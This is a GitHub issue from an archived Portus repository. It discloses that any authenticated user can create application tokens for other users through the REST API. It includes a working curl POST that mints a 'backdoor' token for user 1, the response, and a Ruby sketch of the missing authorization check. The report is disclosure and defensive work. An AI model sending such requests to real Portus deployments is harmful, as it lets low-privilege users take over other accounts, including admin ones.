This repository has been archived by the owner on Apr 17, 2023. It is now read-only.

Users can create application tokens for any user via the REST API #2319

Open
claudiocabral opened this issue Aug 5, 2020 · 3 comments


@claudiocabral

Description

It seems to me that any user can add application tokens to other users via the REST API.

Steps to reproduce

  1. Create a new user (can be a bot) without admin privileges, teams or namespaces
  2. Do a POST request to create a new token for an arbitrary user:

     curl -X POST --header 'Accept: application/json' --header 'Content-Type: application/json' --header 'Portus-Auth: sneakyuser:app_token' --data '{"application":"backdoor"}' 'https://portus.mydomain.com/api/v1/users/1/application_tokens'

  3. Get an application token for user 1:

     {"id":10,"application":"backdoor","plain_token":"a_valid_portus_token"}

  • Expected behavior: Users cannot create tokens for other users
  • Actual behavior: Users can create tokens for other users

Portus version: opensuse/portus:2.4
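The missing check in the report above, as an added example in Ruby (Portus is a Rails application) that is not the project's own code: an authorization guard that compares the user id taken from the URL with the caller identified by the Portus-Auth credentials before any token is minted. The `User` struct, the in-memory `store` hash and the function names are assumptions for the example.

```ruby
require "securerandom"

# Hypothetical stand-ins for the Portus models; not the project's own classes.
User = Struct.new(:id, :username, :admin, keyword_init: true)
class NotAuthorized < StandardError; end

# Vulnerable pattern from the report: the handler trusts the user id taken
# from the URL and never compares it with the authenticated caller, so any
# authenticated user can mint a token for user 1.
def create_token_unchecked(target_user_id, application, store)
  tokens = (store[target_user_id] ||= [])
  token = SecureRandom.hex(16)
  tokens << { application: application, token: token }
  { id: tokens.size, application: application, plain_token: token }
end

# Hardened pattern: the authorization decision is made against the caller
# identified by the Portus-Auth credentials, not against request data.
# Only the account owner (or an admin) may create tokens for a given user.
def authorized_to_create_token?(current_user, target_user_id)
  current_user.admin || current_user.id == target_user_id
end

def create_token_checked(current_user, target_user_id, application, store)
  unless authorized_to_create_token?(current_user, target_user_id)
    # Refuse before anything is generated or persisted, and leave an audit trail
    # so repeated attempts against foreign accounts are visible in the logs.
    warn "DENY user=#{current_user.username} tried to create token for user_id=#{target_user_id}"
    raise NotAuthorized, "cannot create tokens for user #{target_user_id}"
  end
  create_token_unchecked(target_user_id, application, store)
end
```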

@stale

stale bot commented Dec 25, 2020

Thanks for all your contributions!
This issue has been automatically marked as stale because it has not had recent activity. It will be closed if no further activity occurs.

@stale stale bot added the stale label Dec 25, 2020
@prionkor

prionkor commented Jan 7, 2021

This is a serious security issue. Any update on this?

@stale stale bot removed the stale label Jan 7, 2021
@s00500

s00500 commented Nov 22, 2021

?

Development

No branches or pull requests